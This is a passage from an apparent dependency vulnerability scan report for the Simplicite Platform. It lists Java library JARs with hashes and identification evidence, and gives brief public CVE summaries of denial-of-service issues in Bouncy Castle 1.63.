Vendor | pom | parent-artifactid | ow2 | Low
Vendor | pom | parent-groupid | org.ow2 | Medium
Vendor | pom | url | http://asm.ow2.org/ | Highest
Product | file | name | asm | High
Product | jar | package name | asm | Highest
Product | jar | package name | objectweb | Highest
Product | Manifest | bundle-docurl | http://asm.ow2.org | Low
Product | Manifest | Bundle-Name | org.objectweb.asm | Medium
Product | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Product | Manifest | bundle-symbolicname | org.objectweb.asm | Medium
Product | Manifest | Implementation-Title | ASM, a very small and fast Java bytecode manipulation framework | High
Product | pom | artifactid | asm | Highest
Product | pom | developer email | ebruneton@free.fr | Low
Product | pom | developer email | eu@javatx.org | Low
Product | pom | developer email | forax@univ-mlv.fr | Low
Product | pom | developer id | ebruneton | Low
Product | pom | developer id | eu | Low
Product | pom | developer id | forax | Low
Product | pom | developer name | Eric Bruneton | Low
Product | pom | developer name | Eugene Kuleshov | Low
Product | pom | developer name | Remi Forax | Low
Product | pom | groupid | org.ow2.asm | Highest
Product | pom | name | asm | High
Product | pom | organization name | OW2 | Low
Product | pom | organization url | http://www.ow2.org/ | Low
Product | pom | parent-artifactid | ow2 | Medium
Product | pom | parent-groupid | org.ow2 | Medium
Product | pom | url | http://asm.ow2.org/ | Medium
Version | Manifest | Implementation-Version | 7.2-beta | High
Version | pom | parent-version | 7.2-beta | Low
Version | pom | version | 7.2-beta | Highest
auto-value-annotations-1.6.6.jar
Description: Immutable value-type code generation for Java 1.6+.
File Path: /var/simplicite/.m2/repository/com/google/auto/value/auto-value-annotations/1.6.6/auto-value-annotations-1.6.6.jar
MD5: fc2c981dc803b953b9b45ace05a98d8f
SHA1: 9947ae63d8ec42ea159283baf2e5b9c0ff100909
SHA256: 3bf4b9e74a6bf0f38ac70af571e0f8a9d85ccba4c0693a72fea9ea46def0d5a0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | auto-value-annotations | High
Vendor | jar | package name | auto | Highest
Vendor | jar | package name | auto | Low
Vendor | jar | package name | autovalue | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | google | Low
Vendor | jar | package name | value | Highest
Vendor | jar | package name | value | Low
Vendor | pom | artifactid | auto-value-annotations | Highest
Vendor | pom | artifactid | auto-value-annotations | Low
Vendor | pom | groupid | com.google.auto.value | Highest
Vendor | pom | name | AutoValue Annotations | High
Vendor | pom | parent-artifactid | auto-value-parent | Low
Vendor | pom | url | google/auto/tree/master/value | Highest
Product | file | name | auto-value-annotations | High
Product | jar | package name | auto | Highest
Product | jar | package name | auto | Low
Product | jar | package name | autovalue | Highest
Product | jar | package name | google | Highest
Product | jar | package name | value | Highest
Product | jar | package name | value | Low
Product | pom | artifactid | auto-value-annotations | Highest
Product | pom | groupid | com.google.auto.value | Highest
Product | pom | name | AutoValue Annotations | High
Product | pom | parent-artifactid | auto-value-parent | Medium
Product | pom | url | google/auto/tree/master/value | High
Version | file | version | 1.6.6 | High
Version | pom | version | 1.6.6 | Highest
autolink-0.10.0.jar
Description:
Java library to extract links (URLs, email addresses) from plain text;
fast, small and smart about recognizing where links end
License:
MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /var/simplicite/.m2/repository/org/nibor/autolink/autolink/0.10.0/autolink-0.10.0.jar
MD5: be771f6d4d82b9098596afa30b4f48ea
SHA1: 6579ea7079be461e5ffa99f33222a632711cc671
SHA256: 302b30160968415ee6cd1907987138c7575a6315f9b6ef13b9fe3abc87367857
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name autolink High Vendor jar package name autolink Highest Vendor jar package name nibor Highest Vendor Manifest automatic-module-name org.nibor.autolink Medium Vendor pom artifactid autolink Highest Vendor pom artifactid autolink Low Vendor pom developer email robin@nibor.org Low Vendor pom developer name Robin Stocker Medium Vendor pom groupid org.nibor.autolink Highest Vendor pom name autolink-java High Vendor pom url robinst/autolink-java Highest Product file name autolink High Product jar package name autolink Highest Product jar package name nibor Highest Product Manifest automatic-module-name org.nibor.autolink Medium Product pom artifactid autolink Highest Product pom developer email robin@nibor.org Low Product pom developer name Robin Stocker Low Product pom groupid org.nibor.autolink Highest Product pom name autolink-java High Product pom url robinst/autolink-java High Version file version 0.10.0 High Version pom version 0.10.0 Highest
avalon-framework-impl-4.2.0.jar
File Path: /var/simplicite/.m2/repository/avalon-framework/avalon-framework-impl/4.2.0/avalon-framework-impl-4.2.0.jar
MD5: 5c1f8f5c8c6c043538fc4ea038c2aaf6
SHA1: 4da1db18947eb6950abb7ad79253011b9aec0e48
SHA256: ed42c573cab460ca634b5c64a3b40ed1d67d6ee47fe25f87947370bede6af814
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name avalon-framework-impl High Vendor jar package name apache Highest Vendor jar package name avalon Highest Vendor jar package name framework Highest Vendor Manifest extension-name avalon-framework-impl Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid avalon-framework-impl Highest Vendor pom artifactid avalon-framework-impl Low Vendor pom groupid avalon-framework Highest Product file name avalon-framework-impl High Product jar package name avalon Highest Product jar package name framework Highest Product Manifest extension-name avalon-framework-impl Medium Product Manifest Implementation-Title High Product Manifest specification-title Avalon Framework Implementation Medium Product pom artifactid avalon-framework-impl Highest Product pom groupid avalon-framework Highest Version file version 4.2.0 High Version Manifest Implementation-Version 4.2.0 High Version pom version 4.2.0 Highest
aws-s3-2.2.0.jar
Description:
Simple Storage Service (S3) implementation targeted to Amazon Web Services
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/provider/aws-s3/2.2.0/aws-s3-2.2.0.jar
MD5: e0888fec8e07a0030b16eed4fb4c2014
SHA1: 09a357c4d48dc2cc1cfe52a09d15794f6c7c84dd
SHA256: fc971624321f1945574ba23e3dc1327c9d946c1f4c30a50588f75013795154e8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name aws-s3 High Vendor jar package name aws Highest Vendor jar package name jclouds Highest Vendor jar package name s3 Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname aws-s3 Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid aws-s3 Highest Vendor pom artifactid aws-s3 Low Vendor pom groupid org.apache.jclouds.provider Highest Vendor pom name jclouds Amazon Simple Storage Service (S3) provider High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name aws-s3 High Product jar package name aws Highest Product jar package name jclouds Highest Product jar package name s3 Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds Amazon Simple Storage Service (S3) provider Medium Product Manifest bundle-symbolicname aws-s3 Medium Product Manifest Implementation-Title jclouds Amazon Simple Storage Service (S3) provider High Product Manifest specification-title jclouds jclouds Amazon Simple Storage Service (S3) provider Medium Product pom artifactid aws-s3 Highest Product pom groupid org.apache.jclouds.provider Highest Product pom name jclouds Amazon Simple Storage Service (S3) provider High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
azureblob-2.2.0.jar
Description:
jclouds components to access Azure Blob Service
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/provider/azureblob/2.2.0/azureblob-2.2.0.jar
MD5: 6e496c24207ed776f9a933a558d878c6
SHA1: 724f1331e5124dc17621f5417df4c74ee1940be7
SHA256: 17910ad862f1f61ed87875cd735b137c8a7cdeb69f9754448e0004592094f78f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name azureblob High Vendor jar package name azure Highest Vendor jar package name azureblob Highest Vendor jar package name jclouds Highest Vendor jar package name storage Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname azureblob Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid azureblob Highest Vendor pom artifactid azureblob Low Vendor pom groupid org.apache.jclouds.provider Highest Vendor pom name jclouds Azure Storage provider High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name azureblob High Product jar package name azure Highest Product jar package name azureblob Highest Product jar package name jclouds Highest Product jar package name storage Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds Azure Storage provider Medium Product Manifest bundle-symbolicname azureblob Medium Product Manifest Implementation-Title jclouds Azure Storage provider High Product Manifest specification-title jclouds jclouds Azure Storage provider Medium Product pom artifactid azureblob Highest Product pom groupid org.apache.jclouds.provider Highest Product pom name jclouds Azure Storage provider High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
barcode4j-2.1.jar
Description:
Barcode4J is a flexible generator for barcodes written in Java.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/net/sf/barcode4j/barcode4j/2.1/barcode4j-2.1.jar
MD5: 4fc30cdb7b1abaf1ce08f26b0666e351
SHA1: 4b38b2219c0d522fcea8238493f2ea3e238ef529
SHA256: eb7252cc41a1539bcd018348e9f60e0942872bdaa49c58051e656a6be94969fb
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name barcode4j High Vendor jar package name barcode4j Highest Vendor jar package name krysalis Highest Vendor Manifest bundle-docurl http://barcode4j.sourceforge.net Low Vendor Manifest bundle-symbolicname org.krysalis.barcode4j Medium Vendor Manifest implementation-url http://barcode4j.sourceforge.net Low Vendor Manifest Implementation-Vendor The Barcode4J Project High Vendor pom artifactid barcode4j Highest Vendor pom artifactid barcode4j Low Vendor pom developer email buerkle@users.sourceforge.net Low Vendor pom developer email jmaerki@users.sourceforge.net Low Vendor pom developer email nicolaken@krysalis.org Low Vendor pom developer email the_webmaestro@users.sourceforge.net Low Vendor pom developer id buerkle Medium Vendor pom developer id jmaerki Medium Vendor pom developer id nicolaken Medium Vendor pom developer id the_webmaestro Medium Vendor pom developer name Dietmar Bürkle Medium Vendor pom developer name Jeremias Märki Medium Vendor pom developer name Nicola Ken Barozzi Medium Vendor pom developer name Web Maestro Clay Leeds Medium Vendor pom groupid net.sf.barcode4j Highest Vendor pom name Barcode4J High Vendor pom url http://barcode4j.sourceforge.net Highest Product file name barcode4j High Product jar package name barcode4j Highest Product jar package name krysalis Highest Product Manifest bundle-docurl http://barcode4j.sourceforge.net Low Product Manifest Bundle-Name Barcode4J Medium Product Manifest bundle-symbolicname org.krysalis.barcode4j Medium Product Manifest Implementation-Title Barcode4J Library High Product Manifest implementation-url http://barcode4j.sourceforge.net Low Product pom artifactid barcode4j Highest Product pom developer email buerkle@users.sourceforge.net Low Product pom developer email jmaerki@users.sourceforge.net Low Product pom developer email nicolaken@krysalis.org Low Product pom developer email the_webmaestro@users.sourceforge.net Low Product pom developer id buerkle Low Product pom developer id jmaerki Low Product pom developer id nicolaken Low Product pom developer id the_webmaestro Low Product pom developer name Dietmar Bürkle Low Product pom developer name Jeremias Märki Low Product pom developer name Nicola Ken Barozzi Low Product pom developer name Web Maestro Clay Leeds Low Product pom groupid net.sf.barcode4j Highest Product pom name Barcode4J High Product pom url http://barcode4j.sourceforge.net Medium Version file version 2.1 High Version pom version 2.1 Highest
base64-2.3.8.jar
Description:
A Java class providing very fast Base64 encoding and decoding
in the form of convenience methods and input/output streams.
License:
Public domain
File Path: /var/simplicite/.m2/repository/net/iharder/base64/2.3.8/base64-2.3.8.jar
MD5: 9a9828f0caa016a2f3e0c90fe3af771b
SHA1: 7d2e2cea90cc51169fd02a35888820ab07f6d02f
SHA256: bbf41fda22877a538f6bc2d5ad0aa372a7ddf4a756af3386aa09d3d4eea84f7f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name base64 High Vendor jar package name base64 Highest Vendor jar package name iharder Highest Vendor jar package name iharder Low Vendor jar package name net Highest Vendor jar package name net Low Vendor pom artifactid base64 Highest Vendor pom artifactid base64 Low Vendor pom developer email omalley@apache.org Low Vendor pom developer email rob@iharder.net Low Vendor pom developer id omalley Medium Vendor pom developer id rharder Medium Vendor pom developer name Owen O'Malley Medium Vendor pom developer name Robert Harder Medium Vendor pom groupid net.iharder Highest Vendor pom name base64 High Vendor pom url http://iharder.net/base64/ Highest Product file name base64 High Product jar package name base64 Highest Product jar package name iharder Highest Product jar package name iharder Low Product jar package name net Highest Product pom artifactid base64 Highest Product pom developer email omalley@apache.org Low Product pom developer email rob@iharder.net Low Product pom developer id omalley Low Product pom developer id rharder Low Product pom developer name Owen O'Malley Low Product pom developer name Robert Harder Low Product pom groupid net.iharder Highest Product pom name base64 High Product pom url http://iharder.net/base64/ Medium Version file version 2.3.8 High Version pom version 2.3.8 Highest
bcmail-jdk15on-1.63.jar
Description:
The Bouncy Castle Java S/MIME APIs for handling S/MIME protocols. This jar contains S/MIME APIs for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs. The JavaMail API and the Java activation framework will also be needed.
License:
Bouncy Castle Licence: http://www.bouncycastle.org/licence.html
File Path: /var/simplicite/.m2/repository/org/bouncycastle/bcmail-jdk15on/1.63/bcmail-jdk15on-1.63.jar
MD5: 2ff3d5ba2e923c1030401cd7e91dd2bd
SHA1: aa0f31cf8d4717aa213539d469478220d679357f
SHA256: 6078638744a1b3ce842fd70330681c058ad9aa278696dc71c430b4d6449501c3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bcmail-jdk15on High Vendor jar package name bouncycastle Highest Vendor jar package name mail Highest Vendor Manifest application-library-allowable-codebase * Low Vendor Manifest application-name Bouncy Castle S/MIME API Medium Vendor Manifest automatic-module-name org.bouncycastle.mail Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname bcmail Medium Vendor Manifest caller-allowable-codebase * Low Vendor Manifest codebase * Low Vendor Manifest extension-name org.bouncycastle.bcmail Medium Vendor Manifest Implementation-Vendor BouncyCastle.org High Vendor Manifest Implementation-Vendor-Id org.bouncycastle Medium Vendor Manifest multi-release true Low Vendor Manifest originally-created-by 25.222-b10 (Private Build) Low Vendor Manifest permissions all-permissions Low Vendor Manifest specification-vendor BouncyCastle.org Low Vendor Manifest trusted-library true Low Vendor pom artifactid bcmail-jdk15on Highest Vendor pom artifactid bcmail-jdk15on Low Vendor pom developer email feedback-crypto@bouncycastle.org Low Vendor pom developer id feedback-crypto Medium Vendor pom developer name The Legion of the Bouncy Castle Inc. Medium Vendor pom groupid org.bouncycastle Highest Vendor pom name Bouncy Castle S/MIME API High Vendor pom url http://www.bouncycastle.org/java.html Highest Product file name bcmail-jdk15on High Product jar package name bouncycastle Highest Product jar package name mail Highest Product Manifest application-library-allowable-codebase * Low Product Manifest application-name Bouncy Castle S/MIME API Medium Product Manifest automatic-module-name org.bouncycastle.mail Medium Product Manifest Bundle-Name bcmail Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname bcmail Medium Product Manifest caller-allowable-codebase * Low Product Manifest codebase * Low Product Manifest extension-name org.bouncycastle.bcmail Medium Product Manifest multi-release true Low Product Manifest originally-created-by 25.222-b10 (Private Build) Low Product Manifest permissions all-permissions Low Product Manifest trusted-library true Low Product pom artifactid bcmail-jdk15on Highest Product pom developer email feedback-crypto@bouncycastle.org Low Product pom developer id feedback-crypto Low Product pom developer name The Legion of the Bouncy Castle Inc. Low Product pom groupid org.bouncycastle Highest Product pom name Bouncy Castle S/MIME API High Product pom url http://www.bouncycastle.org/java.html Medium Version file version 1.63 High Version Manifest Bundle-Version 1.63 High Version pom version 1.63 Highest
pkg:maven/org.bouncycastle/bcmail-jdk15on@1.63 (Confidence :High)
cpe:2.3:a:bouncycastle:bouncy_castle_for_java:1.63:*:*:*:*:*:*:* (Confidence :Low)
cpe:2.3:a:bouncycastle:legion-of-the-bouncy-castle:1.63:*:*:*:*:*:*:* (Confidence :Low)
CVE-2023-33202
Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack. (For users of the FIPS Java API: BC-FJA 1.0.2.3 and earlier are affected; BC-FJA 1.0.2.4 is fixed.) CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
bcpg-jdk15on-1.63.jar
Description:
The Bouncy Castle Java API for handling the OpenPGP protocol. This jar contains the OpenPGP API for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs.
License:
Bouncy Castle Licence: http://www.bouncycastle.org/licence.html
Apache Software License, Version 1.1: http://www.apache.org/licenses/LICENSE-1.1
File Path: /var/simplicite/.m2/repository/org/bouncycastle/bcpg-jdk15on/1.63/bcpg-jdk15on-1.63.jar
MD5: c551097b29b7d81bc5ae1184a6bcc7c6
SHA1: a93a004e30ba70feb94213bd9adb3bb5295361ef
SHA256: dc4f51adfc46583c2543489c82708fef5660202bf264c7cd453f081a117ea536
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bcpg-jdk15on High Vendor jar package name bcpg Highest Vendor jar package name bouncycastle Highest Vendor jar package name openpgp Highest Vendor Manifest application-library-allowable-codebase * Low Vendor Manifest application-name Bouncy Castle OpenPGP API Medium Vendor Manifest automatic-module-name org.bouncycastle.pg Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname bcpg Medium Vendor Manifest caller-allowable-codebase * Low Vendor Manifest codebase * Low Vendor Manifest extension-name org.bouncycastle.bcpg Medium Vendor Manifest Implementation-Vendor BouncyCastle.org High Vendor Manifest Implementation-Vendor-Id org.bouncycastle Medium Vendor Manifest multi-release true Low Vendor Manifest originally-created-by 25.222-b10 (Private Build) Low Vendor Manifest permissions all-permissions Low Vendor Manifest specification-vendor BouncyCastle.org Low Vendor Manifest trusted-library true Low Vendor pom artifactid bcpg-jdk15on Highest Vendor pom artifactid bcpg-jdk15on Low Vendor pom developer email feedback-crypto@bouncycastle.org Low Vendor pom developer id feedback-crypto Medium Vendor pom developer name The Legion of the Bouncy Castle Inc. Medium Vendor pom groupid org.bouncycastle Highest Vendor pom name Bouncy Castle OpenPGP API High Vendor pom url http://www.bouncycastle.org/java.html Highest Product file name bcpg-jdk15on High Product jar package name bcpg Highest Product jar package name bouncycastle Highest Product jar package name openpgp Highest Product Manifest application-library-allowable-codebase * Low Product Manifest application-name Bouncy Castle OpenPGP API Medium Product Manifest automatic-module-name org.bouncycastle.pg Medium Product Manifest Bundle-Name bcpg Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname bcpg Medium Product Manifest caller-allowable-codebase * Low Product Manifest codebase * Low Product Manifest extension-name org.bouncycastle.bcpg Medium Product Manifest multi-release true Low Product Manifest originally-created-by 25.222-b10 (Private Build) Low Product Manifest permissions all-permissions Low Product Manifest trusted-library true Low Product pom artifactid bcpg-jdk15on Highest Product pom developer email feedback-crypto@bouncycastle.org Low Product pom developer id feedback-crypto Low Product pom developer name The Legion of the Bouncy Castle Inc. Low Product pom groupid org.bouncycastle Highest Product pom name Bouncy Castle OpenPGP API High Product pom url http://www.bouncycastle.org/java.html Medium Version file version 1.63 High Version Manifest Bundle-Version 1.63 High Version pom version 1.63 Highest
pkg:maven/org.bouncycastle/bcpg-jdk15on@1.63 (Confidence :High)
cpe:2.3:a:bouncycastle:bouncy_castle_for_java:1.63:*:*:*:*:*:*:* (Confidence :Low)
cpe:2.3:a:bouncycastle:legion-of-the-bouncy-castle:1.63:*:*:*:*:*:*:* (Confidence :Low)
CVE-2023-33202
Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack. (For users of the FIPS Java API: BC-FJA 1.0.2.3 and earlier are affected; BC-FJA 1.0.2.4 is fixed.) CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
bcpkix-jdk15on-1.63.jar
Description:
The Bouncy Castle Java APIs for CMS, PKCS, EAC, TSP, CMP, CRMF, OCSP, and certificate generation. This jar contains APIs for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs.
License:
Bouncy Castle Licence: http://www.bouncycastle.org/licence.html
File Path: /var/simplicite/.m2/repository/org/bouncycastle/bcpkix-jdk15on/1.63/bcpkix-jdk15on-1.63.jar
MD5: c7dc9b66a0535f44dd088babea47b506
SHA1: 81e2a6d531213271dd936e4a94a041d49e4721e8
SHA256: e9e6a1a9c411681100dce967b6a8e66f4a0bbdc8ae18379a0044dd0e19b888b0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bcpkix-jdk15on High Vendor jar package name bouncycastle Highest Vendor jar package name cmp Highest Vendor jar package name cms Highest Vendor jar package name crmf Highest Vendor jar package name eac Highest Vendor jar package name ocsp Highest Vendor jar package name pkcs Highest Vendor jar package name pkix Highest Vendor jar package name tsp Highest Vendor Manifest application-library-allowable-codebase * Low Vendor Manifest application-name Bouncy Castle PKIX API Medium Vendor Manifest automatic-module-name org.bouncycastle.pkix Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname bcpkix Medium Vendor Manifest caller-allowable-codebase * Low Vendor Manifest codebase * Low Vendor Manifest extension-name org.bouncycastle.bcpkix Medium Vendor Manifest Implementation-Vendor BouncyCastle.org High Vendor Manifest Implementation-Vendor-Id org.bouncycastle Medium Vendor Manifest multi-release true Low Vendor Manifest originally-created-by 25.222-b10 (Private Build) Low Vendor Manifest permissions all-permissions Low Vendor Manifest specification-vendor BouncyCastle.org Low Vendor Manifest trusted-library true Low Vendor pom artifactid bcpkix-jdk15on Highest Vendor pom artifactid bcpkix-jdk15on Low Vendor pom developer email feedback-crypto@bouncycastle.org Low Vendor pom developer id feedback-crypto Medium Vendor pom developer name The Legion of the Bouncy Castle Inc. Medium Vendor pom groupid org.bouncycastle Highest Vendor pom name Bouncy Castle PKIX, CMS, EAC, TSP, PKCS, OCSP, CMP, and CRMF APIs High Vendor pom url http://www.bouncycastle.org/java.html Highest Product file name bcpkix-jdk15on High Product jar package name bouncycastle Highest Product jar package name cmp Highest Product jar package name cms Highest Product jar package name crmf Highest Product jar package name eac Highest Product jar package name ocsp Highest Product jar package name pkcs Highest Product jar package name pkix Highest Product jar package name tsp Highest Product Manifest application-library-allowable-codebase * Low Product Manifest application-name Bouncy Castle PKIX API Medium Product Manifest automatic-module-name org.bouncycastle.pkix Medium Product Manifest Bundle-Name bcpkix Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname bcpkix Medium Product Manifest caller-allowable-codebase * Low Product Manifest codebase * Low Product Manifest extension-name org.bouncycastle.bcpkix Medium Product Manifest multi-release true Low Product Manifest originally-created-by 25.222-b10 (Private Build) Low Product Manifest permissions all-permissions Low Product Manifest trusted-library true Low Product pom artifactid bcpkix-jdk15on Highest Product pom developer email feedback-crypto@bouncycastle.org Low Product pom developer id feedback-crypto Low Product pom developer name The Legion of the Bouncy Castle Inc. Low Product pom groupid org.bouncycastle Highest Product pom name Bouncy Castle PKIX, CMS, EAC, TSP, PKCS, OCSP, CMP, and CRMF APIs High Product pom url http://www.bouncycastle.org/java.html Medium Version file version 1.63 High Version Manifest Bundle-Version 1.63 High Version pom version 1.63 Highest
pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.63 (Confidence :High)
cpe:2.3:a:bouncycastle:bouncy_castle_for_java:1.63:*:*:*:*:*:*:* (Confidence :Low)
cpe:2.3:a:bouncycastle:legion-of-the-bouncy-castle:1.63:*:*:*:*:*:*:* (Confidence :Low)
CVE-2023-33202
Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack. (For users of the FIPS Java API: BC-FJA 1.0.2.3 and earlier are affected; BC-FJA 1.0.2.4 is fixed.) CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
bcprov-jdk15on-1.63.jar
Description:
The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8.
License:
Bouncy Castle Licence: http://www.bouncycastle.org/licence.html
File Path: /var/simplicite/.m2/repository/org/bouncycastle/bcprov-jdk15on/1.63/bcprov-jdk15on-1.63.jar
MD5: d357114f1605c034ebcb99f3c9d36f7e
SHA1: c996f9c64dc0e94e2d2ae962cc7b7cad7744fcc8
SHA256: 28155c8695934f666fabc235f992096e40d97ecb044d5b6b0902db6e15a0b72f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bcprov-jdk15on High Vendor jar package name bouncycastle Highest Vendor jar package name crypto Highest Vendor jar package name jce Highest Vendor jar package name provider Highest Vendor Manifest application-library-allowable-codebase * Low Vendor Manifest application-name Bouncy Castle Provider Medium Vendor Manifest automatic-module-name org.bouncycastle.provider Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname bcprov Medium Vendor Manifest caller-allowable-codebase * Low Vendor Manifest codebase * Low Vendor Manifest extension-name org.bouncycastle.bcprovider Medium Vendor Manifest Implementation-Vendor BouncyCastle.org High Vendor Manifest Implementation-Vendor-Id org.bouncycastle Medium Vendor Manifest multi-release true Low Vendor Manifest originally-created-by 25.222-b10 (Private Build) Low Vendor Manifest permissions all-permissions Low Vendor Manifest specification-vendor BouncyCastle.org Low Vendor Manifest trusted-library true Low Vendor pom artifactid bcprov-jdk15on Highest Vendor pom artifactid bcprov-jdk15on Low Vendor pom developer email feedback-crypto@bouncycastle.org Low Vendor pom developer id feedback-crypto Medium Vendor pom developer name The Legion of the Bouncy Castle Inc. Medium Vendor pom groupid org.bouncycastle Highest Vendor pom name Bouncy Castle Provider High Vendor pom url http://www.bouncycastle.org/java.html Highest Product file name bcprov-jdk15on High Product hint analyzer product legion-of-the-bouncy-castle-java-crytography-api High Product hint analyzer product the_bouncy_castle_crypto_package_for_java High Product jar package name bouncycastle Highest Product jar package name crypto Highest Product jar package name jce Highest Product jar package name provider Highest Product Manifest application-library-allowable-codebase * Low Product Manifest application-name Bouncy Castle Provider Medium Product Manifest automatic-module-name org.bouncycastle.provider Medium Product Manifest Bundle-Name bcprov Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname bcprov Medium Product Manifest caller-allowable-codebase * Low Product Manifest codebase * Low Product Manifest extension-name org.bouncycastle.bcprovider Medium Product Manifest multi-release true Low Product Manifest originally-created-by 25.222-b10 (Private Build) Low Product Manifest permissions all-permissions Low Product Manifest trusted-library true Low Product pom artifactid bcprov-jdk15on Highest Product pom developer email feedback-crypto@bouncycastle.org Low Product pom developer id feedback-crypto Low Product pom developer name The Legion of the Bouncy Castle Inc. Low Product pom groupid org.bouncycastle Highest Product pom name Bouncy Castle Provider High Product pom url http://www.bouncycastle.org/java.html Medium Version file version 1.63 High Version Manifest Bundle-Version 1.63 High Version pom version 1.63 Highest
CVE-2019-17359
The ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.63 can trigger a large attempted memory allocation, and resultant OutOfMemoryError error, via crafted ASN.1 data. This is fixed in 1.64. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2020-15522
